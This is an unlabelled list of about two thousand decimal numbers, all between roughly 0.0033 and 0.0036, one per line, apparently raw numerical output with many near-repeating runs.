0.00355043
0.00355044
0.00354954
0.00355431
0.00356962
0.00355179
0.00355237
0.00354759
0.00356521
0.00355621
0.00355432
0.00356962
0.00355179
0.00355239
0.00355622
0.00356522
0.00354759
0.0035506
0.00353084
0.00353078
0.00353943
0.00355517
0.00353942
0.00355221
0.003548
0.00355317
0.00354776
0.0035511
0.00355146
0.00354848
0.00355221
0.003548
0.00355317
0.00354775
0.00355146
0.0035511
0.00354848
0.00353564
0.00354889
0.0035292
0.00353466
0.00353672
0.0035403
0.00354032
0.00354242
0.00353499
0.00353499
0.00353027
0.00352403
0.00353095
0.00352438
0.00352966
0.00353002
0.00352455
0.00353026
0.00352403
0.00353093
0.00352439
0.00353
0.00352966
0.00352455
0.00353619
0.00354125
0.00354144
0.00353681
0.00353568
0.00354193
0.00353573
0.00353618
0.00354126
0.00354144
0.0035368
0.00354193
0.00353573
0.00353569
0.0035309
0.00352381
0.00352383
0.00352942
0.0035294
0.00352512
0.00352915
0.00353464
0.00355281
0.00355432
0.00354688
0.00354977
0.00354939
0.00355429
0.00354876
0.0035299
0.00355691
0.00354529
0.00351279
0.00354863
0.00354811
0.00355886
0.00355671
0.00356296
0.00354954
0.00354828
0.00355577
0.00354992
0.00354944
0.00355061
0.00355248
0.0035473
0.00353597
0.00354289
0.00354089
0.00353727
0.00354161
0.00353701
0.00353534
0.00352942
0.00352998
0.00352507
0.0035239
0.0035308
0.00353489
0.0035423
0.00353561
0.00354001
0.00353657
0.00353019
0.0035312
0.00352523
0.00352408
0.00352447
0.00353104
0.00352964
0.00353593
0.00354087
0.00354287
0.00353726
0.00354158
0.00353532
0.003537
0.00352941
0.00352998
0.00352507
0.00353079
0.0035239
0.00353486
0.00354228
0.00353559
0.00353997
0.00353655
0.00353018
0.0035312
0.00352409
0.00352524
0.00352963
0.00353104
0.00352449
0.00355278
0.00355432
0.00354975
0.00354685
0.00355427
0.00354939
0.0035487
0.00352987
0.00355697
0.00354528
0.00354863
0.00351285
0.00354811
0.00355886
0.00356297
0.00355669
0.00355577
0.00354832
0.00354954
0.00354986
0.00354942
0.00355058
0.00355246
0.00354728
0.00355283
0.00355434
0.00354686
0.00354975
0.00354942
0.00355429
0.00354872
0.00353004
0.0035571
0.00354535
0.00351313
0.00354873
0.00354817
0.00355889
0.00355675
0.00356301
0.00354837
0.0035496
0.0035558
0.00354996
0.00354944
0.00355063
0.00355251
0.00354732
0.00353595
0.00354286
0.00354088
0.00353726
0.00354157
0.003537
0.00353534
0.00352944
0.00352996
0.00352507
0.00353079
0.00352391
0.00353486
0.00354226
0.00353557
0.00353995
0.00353654
0.00353019
0.0035312
0.00352523
0.00352408
0.00353103
0.00352964
0.00352448
0.00353596
0.00354088
0.00354286
0.00353727
0.00354158
0.00353534
0.003537
0.00352945
0.00353
0.00352508
0.00353081
0.00352392
0.00353486
0.00354227
0.00353559
0.00353997
0.00353655
0.0035302
0.0035312
0.00352408
0.00352524
0.00352965
0.00353104
0.00352449
0.0035535
0.00354731
0.00354732
0.00355044
0.00355041
0.00354953
0.00355431
0.00356962
0.00355173
0.00355237
0.0035476
0.00356522
0.00355621
0.00355431
0.00356962
0.00355177
0.0035524
0.00355622
0.00356521
0.00354761
0.0035506
0.00353065
0.00353071
0.00353943
0.00355514
0.00353938
0.00355221
0.003548
0.00355318
0.00354776
0.00355111
0.00355147
0.00354848
0.00355221
0.00354799
0.00355317
0.00354775
0.00355146
0.0035511
0.00354847
0.00353568
0.00354894
0.00352919
0.00353464
0.00353673
0.00354034
0.00354034
0.00354243
0.00353498
0.003535
0.00353027
0.00352403
0.00353095
0.00352437
0.00352966
0.00353003
0.00352455
0.00353026
0.00352403
0.00353094
0.00352438
0.00353002
0.00352966
0.00352454
0.00353619
0.00354128
0.00354145
0.00353681
0.00353569
0.00354194
0.00353574
0.00353619
0.00354125
0.00354144
0.00353682
0.00354193
0.00353574
0.00353569
0.00353091
0.00352379
0.00352381
0.00352943
0.00352942
0.00352511
0.00352919
0.00353467
0.00355275
0.00355431
0.00354975
0.00354686
0.00355425
0.00354938
0.00354873
0.00352987
0.00355693
0.00354528
0.0035486
0.00351286
0.00354809
0.00355885
0.00356296
0.00355669
0.00355574
0.00354831
0.00354954
0.00354981
0.00354943
0.00355058
0.00355244
0.0035473
0.00355278
0.00355431
0.00354975
0.00354687
0.00355427
0.00354938
0.00354872
0.00352989
0.00355697
0.00354529
0.00351284
0.00354863
0.00354811
0.00355885
0.00356299
0.00355669
0.00354833
0.00355577
0.00354952
0.00354987
0.00354941
0.00355059
0.00355246
0.00354729
0.00353593
0.00354286
0.00354086
0.00353725
0.00354158
0.00353699
0.00353532
0.00352942
0.00352997
0.00352507
0.00353079
0.0035239
0.00353483
0.00354228
0.00353559
0.00354
0.00353654
0.00353017
0.00353119
0.00352523
0.00352406
0.00353103
0.00352962
0.00352446
0.00353593
0.00354286
0.00354086
0.00353725
0.00354155
0.00353699
0.00353531
0.00352942
0.00352997
0.00352506
0.00353079
0.0035239
0.00353484
0.00354226
0.00353559
0.00353994
0.00353654
0.00353017
0.00353119
0.00352523
0.00352406
0.00353103
0.00352962
0.00352446
0.00353576
0.00354895
0.00353572
0.00354892
0.00353673
0.00354032
0.00354029
0.00354243
0.00353499
0.003535
0.00353027
0.00352403
0.00353096
0.00352438
0.00352455
0.00352966
0.00353004
0.00353027
0.00352403
0.00353094
0.00352438
0.00352455
0.00352966
0.00353002
0.00353619
0.00354128
0.00354145
0.00353683
0.00354194
0.00353569
0.00353574
0.00353619
0.00354125
0.00354144
0.00353681
0.00354193
0.00353569
0.00353574
0.00353091
0.00352381
0.00352381
0.00352511
0.00352944
0.00352942
0.00352921
0.00353466
0.00352917
0.00353467
0.00351129
0.00350475
0.00351128
0.00350474
0.00350576
0.00349868
0.00349868
0.00350479
0.0035048
0.00349954
0.00351199
0.00351756
0.00351788
0.00351254
0.00351805
0.00351182
0.0035116
0.00351199
0.00351756
0.00351788
0.00351254
0.00351805
0.00351182
0.00351159
0.0035124
0.00351737
0.00351737
0.00351855
0.00351135
0.00351135
0.00350537
0.00349906
0.00350591
0.00349893
0.0035052
0.00349923
0.00350499
0.00350537
0.00349906
0.00350591
0.00349893
0.0035052
0.00349923
0.00350499
0.00347907
0.0034858
0.00347907
0.0034858
0.0034865
0.003492
0.00349201
0.0034928
0.0034858
0.0034858
0.00347951
0.00347308
0.00347992
0.00347305
0.00347931
0.00347926
0.00347326
0.00347951
0.00347308
0.00347992
0.00347305
0.00347931
0.00347927
0.00347326
0.00348629
0.00349232
0.0034922
0.00348671
0.00349251
0.0034861
0.00348606
0.00348629
0.00349232
0.0034922
0.00348671
0.00349251
0.0034861
0.00348606
0.00347971
0.0034728
0.00347281
0.00347906
0.00347906
0.00347338
0.00350535
0.00350621
0.00349909
0.00349984
0.0035052
0.00350602
0.00349921
0.00351156
0.00351854
0.00351184
0.00351751
0.00351243
0.00351193
0.00351281
0.00351772
0.00351872
0.00351172
0.00351799
0.00351262
0.00350504
0.00349961
0.00350526
0.0035058
0.00349897
0.00348629
0.00349245
0.00349313
0.00348706
0.00349252
0.00348624
0.00348688
0.0034794
0.00347942
0.00347351
0.00347318
0.00347982
0.00348614
0.00349288
0.00348619
0.00349231
0.0034866
0.00347954
0.00348029
0.00347327
0.00347381
0.00347327
0.00347952
0.00348011
0.00348629
0.00349245
0.00349313
0.00348706
0.00349252
0.00348624
0.00348688
0.0034794
0.00347942
0.0034735
0.00347982
0.00347318
0.00348614
0.00349288
0.00348618
0.00349231
0.0034866
0.00347954
0.00348029
0.00347327
0.00347381
0.00347952
0.00348011
0.00347327
0.00350576
0.00349868
0.00349868
0.00350479
0.00350479
0.00349954
0.00351199
0.00351756
0.00351787
0.00351254
0.00351182
0.00351805
0.00351159
0.00351198
0.00351756
0.00351788
0.00351254
0.0035116
0.00351804
0.00351182
0.0035124
0.00351736
0.00351736
0.00351135
0.00351855
0.00351134
0.00350537
0.00349906
0.00350591
0.00349893
0.0035052
0.00350499
0.00349923
0.00350537
0.00349906
0.00350591
0.00349893
0.00350499
0.0035052
0.00349923
0.00351129
0.00350474
0.00347907
0.0034858
0.0034865
0.003492
0.003492
0.0034928
0.0034858
0.0034858
0.00347951
0.00347308
0.00347992
0.00347305
0.00347926
0.0034793
0.00347326
0.00347951
0.00347308
0.00347992
0.00347305
0.00347931
0.00347927
0.00347326
0.00348629
0.00349232
0.0034922
0.00348671
0.00348606
0.00349251
0.0034861
0.00348629
0.00349232
0.0034922
0.00348671
0.00349251
0.0034861
0.00348606
0.00347971
0.0034728
0.0034728
0.00347906
0.00347906
0.00347338
0.00347907
0.0034858
0.00350535
0.0035062
0.00349909
0.00349984
0.0035052
0.00350602
0.00349921
0.00351156
0.00351854
0.00351184
0.00351751
0.00351242
0.00351193
0.0035128
0.00351773
0.00351873
0.00351172
0.003518
0.00351262
0.00350504
0.00349961
0.00350525
0.0035058
0.00349897
0.00348629
0.00349313
0.00349245
0.00348706
0.00349252
0.00348687
0.00348624
0.0034794
0.00347942
0.00347351
0.00347318
0.00347982
0.00348614
0.00349288
0.00348618
0.00349231
0.0034866
0.00347954
0.0034803
0.00347381
0.00347327
0.00347327
0.00348011
0.00347952
0.00348629
0.00349245
0.00349314
0.00348706
0.00349252
0.00348624
0.00348688
0.0034794
0.00347942
0.00347351
0.00347982
0.00347317
0.00348614
0.00349288
0.00348619
0.00349231
0.0034866
0.00347954
0.0034803
0.00347327
0.00347382
0.00347952
0.00348011
0.00347327
0.00350535
0.00350621
0.00349984
0.0034991
0.00350602
0.0035052
0.00349921
0.00351157
0.00351854
0.00351185
0.00351243
0.00351752
0.00351193
0.00351281
0.00351872
0.00351772
0.00351262
0.00351799
0.00351172
0.00350504
0.00349961
0.00350526
0.0035058
0.00349898
0.00350535
0.00350621
0.0034991
0.00349984
0.0035052
0.00350602
0.00349921
0.00351156
0.00351854
0.00351184
0.00351751
0.00351243
0.00351193
0.00351281
0.00351772
0.00351872
0.00351799
0.00351172
0.00351262
0.00350504
0.00349961
0.00350526
0.0035058
0.00349897
0.00348629
0.00349313
0.00349245
0.00348706
0.00349252
0.00348688
0.00348624
0.0034794
0.00347942
0.00347351
0.00347982
0.00347318
0.00348614
0.00349288
0.00348618
0.00349231
0.0034866
0.00347954
0.0034803
0.00347381
0.00347327
0.00348011
0.00347952
0.00347327
0.00348629
0.00349245
0.00349314
0.00348706
0.00349252
0.00348624
0.00348688
0.0034794
0.00347942
0.00347351
0.00347982
0.00347318
0.00348614
0.00349288
0.00348619
0.00349231
0.0034866
0.00347954
0.00348029
0.00347327
0.00347382
0.00347952
0.00348011
0.00347327
0.00350576
0.00349868
0.00349868
0.00350479
0.00350479
0.00349953
0.00351199
0.00351756
0.00351787
0.00351253
0.00351182
0.00351804
0.00351159
0.00351198
0.00351756
0.00351787
0.00351254
0.00351159
0.00351804
0.00351182
0.0035124
0.00351735
0.00351736
0.00351134
0.00351855
0.00351135
0.00350537
0.00349906
0.00350591
0.00349892
0.0035052
0.00350498
0.00349923
0.00350537
0.00349906
0.00350591
0.00349893
0.00350499
0.0035052
0.00349923
0.00351128
0.00350474
0.00347907
0.0034858
0.0034865
0.003492
0.003492
0.00349279
0.0034858
0.0034858
0.00347951
0.00347308
0.00347992
0.00347305
0.00347927
0.00347931
0.00347326
0.00347951
0.00347308
0.00347992
0.00347305
0.00347931
0.00347927
0.00347326
0.00348629
0.00349232
0.0034922
0.00348671
0.00348606
0.00349251
0.0034861
0.00348629
0.00349232
0.0034922
0.00348671
0.00349251
0.0034861
0.00348606
0.00347971
0.0034728
0.0034728
0.00347906
0.00347906
0.00347338
0.00347907
0.0034858
0.00350535
0.00350621
0.00349984
0.00349909
0.00350602
0.0035052
0.00349921
0.00351157
0.00351854
0.00351185
0.00351243
0.00351751
0.00351194
0.00351281
0.00351873
0.00351773
0.00351262
0.003518
0.00351173
0.00350504
0.00349961
0.00350526
0.0035058
0.00349897
0.00350535
0.00350621
0.00349984
0.00349909
0.00350602
0.0035052
0.00349921
0.00351157
0.00351854
0.00351185
0.00351751
0.00351243
0.00351194
0.00351281
0.00351873
0.00351773
0.003518
0.00351262
0.00351173
0.00350504
0.00349961
0.00350526
0.0035058
0.00349898
0.00348629
0.00349313
0.00349245
0.00348706
0.00349252
0.00348687
0.00348624
0.0034794
0.00347942
0.0034735
0.00347982
0.00347317
0.00348614
0.00349287
0.00348618
0.00349231
0.0034866
0.00347954
0.00348029
0.00347381
0.00347326
0.00348011
0.00347952
0.00347327
0.00348629
0.00349313
0.00349245
0.00348706
0.00349252
0.00348688
0.00348624
0.0034794
0.00347942
0.0034735
0.00347982
0.00347318
0.00348614
0.00349288
0.00348618
0.00349231
0.0034866
0.00347954
0.00348029
0.00347381
0.00347326
0.00348011
0.00347952
0.00347327
0.00351128
0.00350474
0.00351129
0.00350475
0.0034865
0.003492
0.003492
0.0034928
0.0034858
0.0034858
0.00347951
0.00347308
0.00347993
0.00347305
0.00347326
0.00347927
0.00347931
0.00347951
0.00347308
0.00347992
0.00347305
0.00347326
0.00347927
0.00347931
0.00348629
0.00349232
0.0034922
0.00348671
0.00349251
0.00348606
0.0034861
0.00348629
0.00349232
0.0034922
0.00348671
0.00349251
0.00348606
0.0034861
0.00347971
0.00347281
0.00347281
0.00347339
0.00347906
0.00347906
0.00347907
0.0034858
0.00347907
0.0034858
0.0034598
0.00345302
0.0034598
0.00345302
0.00345344
0.0034467
0.0034467
0.00345297
0.00345297
0.0034471
0.00346019
0.00346625
0.00346622
0.00346049
0.00346645
0.00345996
0.00346005
0.00346018
0.00346625
0.00346623
0.00346049
0.00346644
0.00345996
0.00346005
0.00346024
0.00346603
0.00346603
0.00346658
0.00345976
0.00345976
0.00345336
0.00344686
0.00345367
0.003447
0.00345312
0.0034471
0.0034532
0.00345336
0.00344686
0.00345367
0.003447
0.00345313
0.0034471
0.0034532
0.00342694
0.00343371
0.00342694
0.00343371
0.003434
0.00343992
0.00343992
0.00344031
0.00343365
0.00343365
0.00342724
0.00342096
0.00342746
0.00342077
0.00342699
0.00342713
0.00342103
0.00342724
0.00342096
0.00342746
0.00342077
0.00342699
0.00342713
0.00342103
0.00343404
0.00344004
0.00344015
0.00343425
0.00344028
0.00343379
0.00343396
0.00343404
0.00344004
0.00344015
0.00343425
0.00344028
0.0034338
0.00343396
0.00342724
0.00342065
0.00342065
0.0034269
0.0034269
0.00342096
0.0034534
0.00345407
0.00344716
0.00344758
0.00345344
0.00345389
0.00344711
0.00346012
0.0034667
0.00346007
0.00346637
0.00346038
0.0034602
0.00346088
0.0034665
0.00346702
0.00346022
0.00346648
0.00346071
0.00345333
0.00344725
0.00345326
0.00345357
0.00344705
0.00343404
0.00344037
0.00344078
0.00343465
0.00344031
0.0034341
0.00343448
0.00342721
0.00342713
0.0034211
0.00342096
0.00342737
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342108
0.00342142
0.00342101
0.00342733
0.00342769
0.00343404
0.00344037
0.00344078
0.00343465
0.00344031
0.0034341
0.00343448
0.00342721
0.00342713
0.0034211
0.00342738
0.00342096
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342108
0.00342142
0.00342733
0.00342769
0.003421
0.00345344
0.0034467
0.0034467
0.00345297
0.00345297
0.0034471
0.00346018
0.00346625
0.00346622
0.00346049
0.00345996
0.00346644
0.00346004
0.00346018
0.00346625
0.00346622
0.00346049
0.00346005
0.00346644
0.00345996
0.00346024
0.00346603
0.00346603
0.00345976
0.00346658
0.00345976
0.00345336
0.00344686
0.00345366
0.00344699
0.00345312
0.0034532
0.0034471
0.00345336
0.00344686
0.00345367
0.003447
0.0034532
0.00345313
0.0034471
0.0034598
0.00345302
0.00342694
0.00343371
0.003434
0.00343992
0.00343992
0.00344031
0.00343365
0.00343365
0.00342724
0.00342096
0.00342746
0.00342077
0.00342713
0.00342699
0.00342103
0.00342724
0.00342096
0.00342746
0.00342077
0.00342699
0.00342713
0.00342103
0.00343404
0.00344004
0.00344015
0.00343425
0.00343396
0.00344028
0.0034338
0.00343404
0.00344004
0.00344015
0.00343425
0.00344028
0.0034338
0.00343396
0.00342724
0.00342065
0.00342065
0.0034269
0.0034269
0.00342096
0.00342694
0.00343371
0.0034534
0.00345407
0.00344716
0.00344759
0.00345344
0.0034539
0.00344711
0.00346013
0.0034667
0.00346007
0.0034664
0.00346038
0.0034602
0.00346088
0.0034665
0.00346702
0.00346022
0.00346649
0.00346071
0.00345331
0.00344725
0.00345327
0.00345357
0.00344706
0.00343404
0.00344078
0.00344037
0.00343465
0.00344031
0.00343448
0.0034341
0.00342721
0.00342713
0.0034211
0.00342096
0.00342738
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342142
0.00342108
0.003421
0.00342769
0.00342733
0.00343403
0.00344037
0.00344078
0.00343465
0.00344031
0.0034341
0.00343448
0.00342721
0.00342713
0.0034211
0.00342737
0.00342096
0.00343399
0.00344045
0.00343391
0.00344025
0.00343415
0.00342726
0.00342786
0.00342108
0.00342142
0.00342733
0.00342769
0.003421
0.0034534
0.00345407
0.00344759
0.00344716
0.00345389
0.00345344
0.00344711
0.00346012
0.00346671
0.00346007
0.00346038
0.00346637
0.0034602
0.00346089
0.00346702
0.00346651
0.00346071
0.00346649
0.00346022
0.00345334
0.00344725
0.00345326
0.00345357
0.00344705
0.0034534
0.00345407
0.00344716
0.00344759
0.00345344
0.0034539
0.00344711
0.00346013
0.00346671
0.00346007
0.00346637
0.00346038
0.0034602
0.00346088
0.0034665
0.00346702
0.00346649
0.00346022
0.00346071
0.00345334
0.00344725
0.00345327
0.00345357
0.00344705
0.00343404
0.00344078
0.00344038
0.00343465
0.00344032
0.00343448
0.0034341
0.00342721
0.00342713
0.0034211
0.00342738
0.00342096
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342142
0.00342108
0.00342769
0.00342733
0.00342101
0.00343404
0.00344038
0.00344078
0.00343465
0.00344032
0.0034341
0.00343448
0.00342721
0.00342713
0.0034211
0.00342738
0.00342096
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342108
0.00342142
0.00342733
0.00342769
0.00342101
0.00345344
0.0034467
0.0034467
0.00345297
0.00345297
0.0034471
0.00346018
0.00346625
0.00346622
0.00346049
0.00345996
0.00346644
0.00346004
0.00346018
0.00346625
0.00346622
0.00346049
0.00346005
0.00346644
0.00345996
0.00346024
0.00346603
0.00346603
0.00345976
0.00346658
0.00345976
0.00345336
0.00344686
0.00345367
0.00344699
0.00345313
0.0034532
0.0034471
0.00345336
0.00344686
0.00345367
0.003447
0.0034532
0.00345313
0.0034471
0.0034598
0.00345301
0.00342694
0.00343371
0.003434
0.00343992
0.00343992
0.00344031
0.00343365
0.00343365
0.00342724
0.00342096
0.00342746
0.00342077
0.00342713
0.00342699
0.00342102
0.00342724
0.00342096
0.00342746
0.00342077
0.00342699
0.00342713
0.00342103
0.00343404
0.00344004
0.00344015
0.00343425
0.00343396
0.00344028
0.00343379
0.00343404
0.00344004
0.00344015
0.00343425
0.00344028
0.0034338
0.00343396
0.00342724
0.00342065
0.00342065
0.0034269
0.0034269
0.00342096
0.00342694
0.00343371
0.0034534
0.00345407
0.00344758
0.00344716
0.00345389
0.00345344
0.00344711
0.00346012
0.0034667
0.00346007
0.00346038
0.00346637
0.00346019
0.00346088
0.00346701
0.0034665
0.0034607
0.00346648
0.00346022
0.00345333
0.00344725
0.00345326
0.00345357
0.00344705
0.0034534
0.00345407
0.00344758
0.00344716
0.00345389
0.00345344
0.00344711
0.00346012
0.00346671
0.00346007
0.00346637
0.00346038
0.00346019
0.00346088
0.00346702
0.0034665
0.00346648
0.0034607
0.00346022
0.00345333
0.00344725
0.00345326
0.00345357
0.00344705
0.00343404
0.00344078
0.00344037
0.00343465
0.00344031
0.00343448
0.0034341
0.00342721
0.00342713
0.0034211
0.00342737
0.00342096
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342142
0.00342108
0.00342769
0.00342733
0.003421
0.00343404
0.00344078
0.00344037
0.00343465
0.00344031
0.00343448
0.0034341
0.00342721
0.00342713
0.0034211
0.00342738
0.00342096
0.00343399
0.00344045
0.00343392
0.00344026
0.00343415
0.00342726
0.00342786
0.00342142
0.00342108
0.00342769
0.00342733
0.00342101
0.0034598
0.00345302
0.0034598
0.00345301
0.003434
0.00343992
0.00343992
0.00344032
0.00343366
0.00343366
0.00342724
0.00342096
0.00342746
0.00342078
0.00342103
0.00342713
0.00342699
0.00342724
0.00342096
0.00342746
0.00342078
0.00342103
0.00342713
0.00342699
0.00343404
0.00344004
0.00344015
0.00343425
0.00344028
0.00343396
0.0034338
0.00343404
0.00344004
0.00344015
0.00343425
0.00344028
0.00343396
0.0034338
0.00342724
0.00342065
0.00342065
0.00342096
0.00342689
0.00342689
0.00342694
0.00343371
0.00342694
0.00343371
0.00340776
0.00340106
0.00340776
0.00340106
0.00340129
0.00339483
0.00339483
0.00340101
0.00340101
0.00339508
0.00340807
0.00341416
0.003414
0.00340821
0.00341425
0.00340782
0.00340802
0.00340807
0.00341416
0.003414
0.00340821
0.00341425
0.00340782
0.00340802
0.00340798
0.00341392
0.00341392
0.00341423
0.0034077
0.0034077
0.00340132
0.00339493
0.00340148
0.00339515
0.00340107
0.00339518
0.00340125
0.00340132
0.00339493
0.00340148
0.00339515
0.00340107
0.00339518
0.00340125
0.00337546
0.00338208
0.00337546
0.00338208
0.00338227
0.00338817
0.00338817
0.00338843
0.00338203
0.00338203
0.00337571
0.00336964
0.00337582
0.00336942
0.00337547
0.00337566
0.00336966
0.00337571
0.00336964
0.00337583
0.00336942
0.00337547
0.00337566
0.00336966
0.00338238
0.00338823
0.00338841
0.00338246
0.00338848
0.00338213
0.00338235
0.00338238
0.00338823
0.00338841
0.00338246
0.00338848
0.00338213
0.00338235
0.00337567
0.00336932
0.00336932
0.00337542
0.00337542
0.00336955
0.00340132
0.00340184
0.00339521
0.0033955
0.0034014
0.00340169
0.00339513
0.00340799
0.00341436
0.00340793
0.00341421
0.00340812
0.00340803
0.00340858
0.00341433
0.00341466
0.00340811
0.00341425
0.00340842
0.00340127
0.00339521
0.0034012
0.00340141
0.00339508
0.0033823
0.00338853
0.0033888
0.00338279
0.00338845
0.00338238
0.00338265
0.00337562
0.00337558
0.00336965
0.00336951
0.00337576
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336965
0.00336989
0.00336957
0.00337575
0.00337599
0.0033823
0.00338853
0.0033888
0.00338279
0.00338845
0.00338238
0.00338265
0.00337562
0.00337559
0.00336965
0.00337577
0.00336951
0.00338225
0.00338854
0.00338222
0.0033884
0.00338239
0.00337567
0.00337613
0.00336965
0.00336989
0.00337575
0.00337599
0.00336957
0.00340129
0.00339483
0.00339483
0.00340101
0.00340101
0.00339508
0.00340807
0.00341416
0.003414
0.00340821
0.00340782
0.00341425
0.00340802
0.00340807
0.00341416
0.003414
0.00340821
0.00340802
0.00341425
0.00340782
0.00340798
0.00341392
0.00341392
0.0034077
0.00341423
0.0034077
0.00340132
0.00339493
0.00340148
0.00339515
0.00340107
0.00340125
0.00339518
0.00340132
0.00339493
0.00340148
0.00339515
0.00340125
0.00340107
0.00339518
0.00340776
0.00340106
0.00337546
0.00338208
0.00338227
0.00338817
0.00338817
0.00338843
0.00338203
0.00338203
0.00337571
0.00336964
0.00337583
0.00336942
0.00337566
0.00337547
0.00336966
0.00337571
0.00336964
0.00337583
0.00336942
0.00337547
0.00337566
0.00336966
0.00338238
0.00338823
0.00338841
0.00338247
0.00338235
0.00338848
0.00338213
0.00338238
0.00338823
0.00338841
0.00338247
0.00338848
0.00338213
0.00338235
0.00337567
0.00336932
0.00336932
0.00337542
0.00337542
0.00336955
0.00337546
0.00338208
0.00340131
0.00340184
0.00339521
0.00339549
0.00340139
0.00340169
0.00339513
0.00340798
0.00341435
0.00340792
0.00341421
0.00340811
0.00340803
0.00340858
0.00341433
0.00341466
0.00340811
0.00341425
0.00340842
0.00340126
0.0033952
0.0034012
0.0034014
0.00339508
0.0033823
0.0033888
0.00338853
0.00338278
0.00338845
0.00338264
0.00338238
0.00337561
0.00337558
0.00336965
0.00336951
0.00337576
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336988
0.00336964
0.00336957
0.00337599
0.00337575
0.0033823
0.00338853
0.0033888
0.00338278
0.00338845
0.00338238
0.00338264
0.00337561
0.00337558
0.00336965
0.00337576
0.0033695
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336964
0.00336988
0.00337575
0.00337599
0.00336957
0.00340132
0.00340184
0.0033955
0.00339521
0.00340169
0.0034014
0.00339513
0.00340799
0.00341436
0.00340793
0.00340812
0.00341421
0.00340803
0.00340858
0.00341466
0.00341433
0.00340842
0.00341426
0.00340811
0.00340127
0.00339521
0.0034012
0.00340141
0.00339508
0.00340132
0.00340184
0.00339521
0.0033955
0.0034014
0.00340169
0.00339513
0.00340799
0.00341436
0.00340793
0.00341421
0.00340812
0.00340803
0.00340858
0.00341433
0.00341466
0.00341426
0.00340811
0.00340842
0.00340127
0.00339521
0.0034012
0.00340141
0.00339508
0.0033823
0.0033888
0.00338853
0.00338279
0.00338845
0.00338265
0.00338238
0.00337562
0.00337559
0.00336965
0.00337576
0.00336951
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336989
0.00336965
0.00337599
0.00337575
0.00336957
0.0033823
0.00338853
0.0033888
0.00338279
0.00338845
0.00338238
0.00338265
0.00337561
0.00337559
0.00336965
0.00337576
0.00336951
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336965
0.00336989
0.00337575
0.00337599
0.00336957
0.00340129
0.00339483
0.00339483
0.00340101
0.00340101
0.00339508
0.00340807
0.00341416
0.00341399
0.00340821
0.00340781
0.00341425
0.00340802
0.00340807
0.00341416
0.003414
0.00340821
0.00340802
0.00341425
0.00340781
0.00340798
0.00341392
0.00341392
0.0034077
0.00341423
0.0034077
0.00340132
0.00339493
0.00340148
0.00339515
0.00340107
0.00340125
0.00339518
0.00340132
0.00339493
0.00340148
0.00339515
0.00340125
0.00340107
0.00339518
0.00340776
0.00340105
0.00337546
0.00338208
0.00338227
0.00338817
0.00338817
0.00338843
0.00338203
0.00338203
0.00337571
0.00336964
0.00337582
0.00336942
0.00337566
0.00337547
0.00336966
0.00337571
0.00336964
0.00337583
0.00336942
0.00337547
0.00337566
0.00336966
0.00338238
0.00338823
0.00338841
0.00338246
0.00338235
0.00338847
0.00338213
0.00338238
0.00338823
0.00338841
0.00338247
0.00338848
0.00338213
0.00338235
0.00337567
0.00336932
0.00336932
0.00337542
0.00337542
0.00336955
0.00337546
0.00338208
0.00340132
0.00340184
0.0033955
0.00339521
0.00340169
0.0034014
0.00339513
0.00340799
0.00341435
0.00340793
0.00340811
0.00341421
0.00340803
0.00340858
0.00341466
0.00341433
0.00340842
0.00341425
0.00340811
0.00340127
0.00339521
0.0034012
0.00340141
0.00339508
0.00340132
0.00340184
0.0033955
0.00339521
0.00340169
0.0034014
0.00339513
0.00340799
0.00341436
0.00340793
0.00341421
0.00340812
0.00340803
0.00340858
0.00341466
0.00341433
0.00341425
0.00340842
0.00340811
0.00340127
0.00339521
0.0034012
0.00340141
0.00339508
0.0033823
0.0033888
0.00338853
0.00338279
0.00338845
0.00338264
0.00338238
0.00337561
0.00337559
0.00336965
0.00337576
0.00336951
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336989
0.00336964
0.00337599
0.00337575
0.00336957
0.0033823
0.0033888
0.00338853
0.00338279
0.00338845
0.00338264
0.00338238
0.00337561
0.00337559
0.00336965
0.00337576
0.00336951
0.00338225
0.00338854
0.00338222
0.0033884
0.00338238
0.00337567
0.00337613
0.00336988
0.00336964
0.00337599
0.00337575
0.00336957
0.00340776
0.00340106
0.00340776
0.00340106
0.00338227
0.00338817
0.00338817
0.00338844
0.00338203
0.00338203
0.00337571
0.00336964
0.00337583
0.00336942
0.00336966
0.00337566
0.00337547
0.00337571
0.00336964
0.00337583
0.00336942
0.00336966
0.00337566
0.00337547
0.00338238
0.00338823
0.00338841
0.00338247
0.00338848
0.00338235
0.00338213
0.00338238
0.00338823
0.00338841
0.00338247
0.00338848
0.00338235
0.00338213
0.00337567
0.00336932
0.00336932
0.00336955
0.00337542
0.00337542
0.00337546
0.00338208
0.00337546
0.00338208
0.00335674
0.00335021
0.00335674
0.00335021
0.00335042
0.00334416
0.00334416
0.00335018
0.00335018
0.00334439
0.00335703
0.00336299
0.0033628
0.00335708
0.00336304
0.00335679
0.00335702
0.00335703
0.00336299
0.0033628
0.00335708
0.00336304
0.00335679
0.00335702
0.00335692
0.00336276
0.00336276
0.003363
0.0033567
0.0033567
0.00335046
0.00334426
0.00335054
0.00334449
0.00335023
0.0033445
0.00335042
0.00335046
0.00334426
0.00335054
0.00334449
0.00335023
0.0033445
0.00335042
0.00332533
0.00333176
0.00332533
0.00333176
0.00333195
0.0033377
0.0033377
0.00333793
0.00333173
0.00333173
0.00332558
0.00331971
0.00332563
0.00331949
0.00332535
0.00332555
0.00331972
0.00332558
0.00331971
0.00332563
0.00331949
0.00332535
0.00332554
0.00331972
0.00333206
0.00333774
0.00333793
0.00333208
0.00333797
0.00333183
0.00333206
0.00333206
0.00333774
0.00333793
0.00333208
0.00333797
0.00333183
0.00333206
0.00332555
0.00331938
0.00331938
0.00332531
0.00332531
0.00331961
0.00335038
0.00335078
0.00334444
0.00334465
0.00335045
